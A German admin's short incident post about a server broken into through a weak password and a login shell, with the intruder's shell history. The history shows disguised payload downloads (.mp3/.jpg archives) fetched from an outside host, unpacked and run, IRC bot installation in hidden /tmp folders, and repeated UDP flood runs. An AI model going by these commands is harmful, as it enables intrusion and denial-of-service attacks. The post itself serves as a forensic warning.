Durch einen ungeschickten useradd-Befehl gepaart mit Passwort == Username, wurde mal ein Server schnell kompromittiert. Dem useradd-Befehl wurde dann auch nicht per „-s /bin/false“ keine Shell zugewiesen, sondern es wurde „/bin/sh“ per Default gesetzt. So fand jemand sehr schnell die Einstiegsluke.
In Unterverzeichnissen von /tmp wurden einige Exploit-Skripts und eine IRC-Bot-Software installiert. Unter anderem beinhaltete die Softwaresammlung auch den Bot Eggdrop.
Nachdem ich den Angreifer ausgesperrt hatte, konnte ich in der Shell-History das Vorgehen einsehen.
Sowas darf nicht passieren!
Hier die Shell-History (die IP-Adressen und Hostnamen sind geändert):
w
ls -a
ps x
ls -a
cd /tmp
ls -a
cd .IU
ls -a
cd .ICE-unix/
ls -a
./start 176
w
ls -a
ps x
wget host.domain.org/mig.mp3
tar xzvf mig.mp3
rm -rf mig.mp3
cd “ „
ls -a
screen -r
screen
ls -a
ps x
cd /tmp/.ICE-unix/
ls -a
wget host.domain.org/mechrc.jpg
tar xvf mechrc.jpg
cd .kde/
./run
cd ..
rm -rf .kde/
sudo su
w
ps x
w
ls -a
nmap
ls -a
uname -a
sudo su
wget host.domain.am/exploit/exploit.tgz;tar xzvf exploit.tgz; cd .exploit; perl run.pl
ls -a
cd ..
ls -a
rm -rf .exploit exploit.tgz
w
uname -a
w
cat /proc/cpuinfo
w
ls -a
/sbin/ifconfig
sudo su
uname -a
screen -r
w
ls -a
ps x
cat /etc/issue
cat /proc/cpuinfo
/sbin/ifconfig
sudo su
ls -a
uname -a
wget host.domain.am/exploit/exploit.tgz;tar xzvf exploit.tgz; cd .exploit; perl run.pl
cd ..
ls -a
rm -rf .exploit/ exploit.tgz
ls -a
rm -rf W2Ksp3.exe
ls -a
wget host.domain.org/udp.tgz
tar xzvf udp.tgz
rm -rf udp.tgz
chmod +x *
ps x
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 0 0
wget wget host.domain.org/gt.tgz ; tar xzvf gt.tgz ; rm -rf gt.tgz ; cd .kde ; ./run ; ./autorun
cd ..
rm -rf .kde/
ls -a
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 0 0
w
ls -a
ps x
ls -a
cd /tmp/.i
ls -a
cd /tmp
ls -a
cd .ICE-unix/
ls -a
cd psy-autologin-autorun/
ls -a
cat psybnc.conf.old
w
ls -a
ps x
cd ..
rm -rf psy-autologin-autorun/
ps x
nmap
ls -a
wget host.domain.org/eggdrop.tgz
ps x
kill -9 13641364
kill -9 1364
cd egg
tar xzvf eggdrop.tgz
rm -rf eggdrop.tgz
cd .new/
./go
ps x
cat /proc/cpuinfo
ls -a
htop
ls -a
nmap
cd ..
ls -a
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe*
ls -a
cd ..
rm -rf .new
./a 210.0
cd ..
rm -rf .s/
ls -a
wget host.domain.org/ss.tgz
tar xzvf ss.tgz
rm -rf ss.tgz
cd .s/
./a 210.0
cd ..
rm -rf .s/
wget host.domain.org/privatescan.tgz
tar xzvf privatescan.tgz
rm -rf privatescan.tgz
cd .s/
ls -a
screen
w
ls -a
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 0 0
w
ls -a
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 0 0
w
ls -a
wget host.domain.org/mechrc.jpg ; tar xzvf mechrc.jpg ; rm -rf mechrc.jpg ; cd .kde ; ls -a
./run
cd ..
rm -rf .kde/
ls -a
wget host.domain.org/miau.jpg
tar xzvf miau.jpg
rm -rf miau.jpg
cd lib/
./h
cd ..
rm -rf lib/
gcc
sudo apt-get install ld-linux.so.2
php -v
screen -r
sudo su
ls -a
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 0 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6667 0
perl udp.pl 1.2.3.4 6666 0
perl udp.pl 1.2.3.4 7000 0